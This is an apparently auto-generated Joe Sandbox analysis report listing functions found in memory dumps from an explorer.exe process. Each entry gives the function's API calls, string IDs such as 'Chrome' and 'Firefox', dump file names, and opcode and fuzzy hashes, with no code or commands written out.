                                                                                                                                                                                                                        Function 0FF5AC00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0FF48900: HeapCreate.KERNEL32 ref: 0FF4891D
                                                                                                                                                                                                                          • Part of subcall function 0FF5C210: lstrcpyA.KERNEL32 ref: 0FF5C264
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0FF5AC31
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0FF5AC3E
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction ID: 7aeb946acb9c07068a7ff710bebd53412e9a87eaf84bf65926f54834b5465567
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f75b6d144aa2e89b2a0a7f3023aa869e0bfe81cb2fc528cef3ac5ed3374d85c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDE0EA24511F4391EB20AB50FC943B476A4BB54BD5FC10135854942A61EF78819AE755
                                                                                                                                                                                                                        Function 0DFB0470 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 48088abaaf4411e3317b772e7716f931d4dff2bb768320eb294f86bc06f0b391
                                                                                                                                                                                                                        • Instruction ID: d57244860cb4866fa472a59ed02786abcf29cae415d2b547a23ee6c436e61db5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48088abaaf4411e3317b772e7716f931d4dff2bb768320eb294f86bc06f0b391
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C701AD2271979182EA549B5BF94432AA3E1EB8DFD0F089035DE4F43B28EE2CC5418B40
                                                                                                                                                                                                                        Function 0E110470 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 9fe29a416980ee82e288fb8b245973f184e2c677b64d133d90a38ed37bb97db4
                                                                                                                                                                                                                        • Instruction ID: dc7efb154c4a7ba49e78f3b229e7f99632b64b2ae203dda74f9d96c9602649dc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fe29a416980ee82e288fb8b245973f184e2c677b64d133d90a38ed37bb97db4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C018F71B1969181DA549B17FA5436AA2D0AB8CFC0F085434DE4E53B59EF3CC8C18B40
                                                                                                                                                                                                                        Function 0FF50470 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 9fe29a416980ee82e288fb8b245973f184e2c677b64d133d90a38ed37bb97db4
                                                                                                                                                                                                                        • Instruction ID: 3fd71057719a87543b7561b0b8ea103b954a089b13be65f4c5c41be9292b0b76
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fe29a416980ee82e288fb8b245973f184e2c677b64d133d90a38ed37bb97db4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86016D2271979282EE649B16B94433AA6E1EF4DFD0F885034DE4E47F19EF2CD4868B40
                                                                                                                                                                                                                        Function 0DFA4800 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        • Opcode ID: 07c6a1f62abfec7a3254dbe75e57d0dc4e2a47e41d881ffabeee230261a90467
                                                                                                                                                                                                                        • Instruction ID: d78ed30423e7e41bd75995c2ff978fb04a0fbf014c5705ebdf99747561375954
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07c6a1f62abfec7a3254dbe75e57d0dc4e2a47e41d881ffabeee230261a90467
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 676117A2708A8086EB21CF6DE85437A7B64F385B84F49C626CF5F0B791DBADC441C704
                                                                                                                                                                                                                        Function 0E104800 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        • Opcode ID: 07c6a1f62abfec7a3254dbe75e57d0dc4e2a47e41d881ffabeee230261a90467
                                                                                                                                                                                                                        • Instruction ID: 64624d80bcec895b42a388e8072376da0f3354fb200fe71884e49ce32f4a4a05
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07c6a1f62abfec7a3254dbe75e57d0dc4e2a47e41d881ffabeee230261a90467
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8661E632314A90C6EB21CB65E4D436A6B90E389B84F9A4A15CF6B077D5DBBDCCC1C705
                                                                                                                                                                                                                        Function 0FF44800 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        • Opcode ID: 07c6a1f62abfec7a3254dbe75e57d0dc4e2a47e41d881ffabeee230261a90467
                                                                                                                                                                                                                        • Instruction ID: 4b1ffc64eedaa1f466b2fb74e5b7e6facee7dce4200ec1b03d9d0a298fa9d041
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07c6a1f62abfec7a3254dbe75e57d0dc4e2a47e41d881ffabeee230261a90467
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B613422708B8086EB21CF25E85436A7FA0EB85B84F994265CF9A57793DF3DF081D714
                                                                                                                                                                                                                        Function 0DEDDD45 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DEDDD5E
                                                                                                                                                                                                                          • Part of subcall function 0DEDF615: std::_Lockit::_Lockit.LIBCPMT ref: 0DEDF62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DEDDDC3
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DEDDDF1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DEDDE02
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        • Opcode ID: 1fa2c8052f97d5d7099a3dba504b04b099dd196e9b161c21979d5026105ac57f
                                                                                                                                                                                                                        • Instruction ID: 11e7cd24dc54ec6193946767311df4bb4ccfcbb3e42af8740505084173fba240
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fa2c8052f97d5d7099a3dba504b04b099dd196e9b161c21979d5026105ac57f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B118E3121CF4C8F8B85EB2CC89466AB3E1FBA8354F51562EA24AC3264EF74D905C781
                                                                                                                                                                                                                        Function 0DEDDE15 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0DEDDE2E
                                                                                                                                                                                                                          • Part of subcall function 0DEDF615: std::_Lockit::_Lockit.LIBCPMT ref: 0DEDF62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0DEDDE93
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0DEDDEC1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0DEDDED2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        • Opcode ID: 4b1d068d7190174df8863ee58d4bc05c89d15a2a06e5c1404ac02c3edded7180
                                                                                                                                                                                                                        • Instruction ID: 8799c04074faec9b3c34322174707b9308c93518a8b33f7e17db6b7caa959d62
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b1d068d7190174df8863ee58d4bc05c89d15a2a06e5c1404ac02c3edded7180
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6411933161CF4C8F8B85EB2CC4D466A73E1FBA8354F515A1E914AC3364DE74D905C781
                                                                                                                                                                                                                        Function 0822DD45 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0822DD5E
                                                                                                                                                                                                                          • Part of subcall function 0822F615: std::_Lockit::_Lockit.LIBCPMT ref: 0822F62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0822DDC3
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0822DDF1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0822DE02
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        • Opcode ID: 1fa2c8052f97d5d7099a3dba504b04b099dd196e9b161c21979d5026105ac57f
                                                                                                                                                                                                                        • Instruction ID: 308ac2ad8e8ad12fa73df89a08923b78b9d1e59d7214673f9ec3d240041b3de1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fa2c8052f97d5d7099a3dba504b04b099dd196e9b161c21979d5026105ac57f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE119375628F2C8F8755EB2CC4A466AB3E1FFA8302F504A2E904AC3368DF74D905C781
                                                                                                                                                                                                                        Function 0822DE15 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0822DE2E
                                                                                                                                                                                                                          • Part of subcall function 0822F615: std::_Lockit::_Lockit.LIBCPMT ref: 0822F62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0822DE93
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0822DEC1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0822DED2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        • Opcode ID: 4b1d068d7190174df8863ee58d4bc05c89d15a2a06e5c1404ac02c3edded7180
                                                                                                                                                                                                                        • Instruction ID: f6e747a7f14fbb2541b0fc59a45fa71e57ba9cc83d674a4dba9d0ec01bd80127
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b1d068d7190174df8863ee58d4bc05c89d15a2a06e5c1404ac02c3edded7180
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C119375628F2C8F8B95EB2CC4E466A73E1FBA8302F40461E905AC3368DE74D905CB81
                                                                                                                                                                                                                        Function 0E08DE15 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E08DE2E
                                                                                                                                                                                                                          • Part of subcall function 0E08F615: std::_Lockit::_Lockit.LIBCPMT ref: 0E08F62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0E08DE93
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E08DEC1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E08DED2
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        • Opcode ID: 4b1d068d7190174df8863ee58d4bc05c89d15a2a06e5c1404ac02c3edded7180
                                                                                                                                                                                                                        • Instruction ID: c172f909fcf3ca2c6ce592f496ebf132735b34ce44060245964ac86ecf16bee4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b1d068d7190174df8863ee58d4bc05c89d15a2a06e5c1404ac02c3edded7180
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16115131618E4C4F9B85FF28D4D46AAB7E1FBA8310F504B2E908AC32A8DE74DD05D781
                                                                                                                                                                                                                        Function 0E08DD45 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0E08DD5E
                                                                                                                                                                                                                          • Part of subcall function 0E08F615: std::_Lockit::_Lockit.LIBCPMT ref: 0E08F62B
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0E08DDC3
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0E08DDF1
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0E08DE02
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrowstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 784803821-0
                                                                                                                                                                                                                        • Opcode ID: 1fa2c8052f97d5d7099a3dba504b04b099dd196e9b161c21979d5026105ac57f
                                                                                                                                                                                                                        • Instruction ID: 9ed0ebbf84b098b3398f8b2cc910e2f0969109894b8d64bcc002f31d8601c21a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fa2c8052f97d5d7099a3dba504b04b099dd196e9b161c21979d5026105ac57f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76117F31618F4C4F9B85FF28D4E46AAB7E1FBA8250F504A2A908AC3368DF34DD45D781
                                                                                                                                                                                                                        Function 0E1082A0 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4115577372-0
                                                                                                                                                                                                                        • Opcode ID: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction ID: 586a589cba21b0d55c261b3c246d2bcd9d377ad471d45d0b69a5f81490d8c168
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8931BF722086C08AD7198F36E50036D7BA0F749F88F494216EF994B79ACB7CD991C754
                                                                                                                                                                                                                        Function 0FF482A0 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4115577372-0
                                                                                                                                                                                                                        • Opcode ID: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction ID: 5f08ff4f2db674ff3bb35e622b477f825802a7dc242619f953fbf5005f65b3a0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe74c791cee3bb267ed279a6aec151c89a8742d1631147c35825e6bff1c0b2c2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1131AEA36186C186D7218F35A50037DBF60FB05FC8F484226EF998BB9ACB6CE451C754
                                                                                                                                                                                                                        Function 0DEF0BD1 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0DEF0BEE
                                                                                                                                                                                                                          • Part of subcall function 0DEF7C45: _FindPESection.LIBCMT ref: 0DEF7C6E
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 0DEF0BFF
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 0DEF0C12
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 0DEF0C5B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction ID: fe2de54080c22e50a77de8cc18995bbcf9705b168fdacca339d2aeb55084e3f7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B711E931214A098FE729FB34EC943F63392FB44345F41A5359603D20A5EF78D685C681
                                                                                                                                                                                                                        Function 08240BD1 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 08240BEE
                                                                                                                                                                                                                          • Part of subcall function 08247C45: _FindPESection.LIBCMT ref: 08247C6E
                                                                                                                                                                                                                        • _initp_misc_cfltcvt_tab.LIBCMT ref: 08240BFF
                                                                                                                                                                                                                        • _initterm_e.LIBCMT ref: 08240C12
                                                                                                                                                                                                                        • _IsNonwritableInCurrentImage.LIBCMT ref: 08240C5B
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1991439119-0
                                                                                                                                                                                                                        • Opcode ID: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction ID: cdf6fe5564754398c7ecf241412835b904b1def306c9648f4cf99a929e9cf3da
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb86c4fe0cfded19f432ce58ad1a05de0dd76ed6020dada85e79aef0ea0b9e7d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0118635130E0BCFE76DEB34EC946A63394FB44242F4455399907C3164EF7895C6CAA5
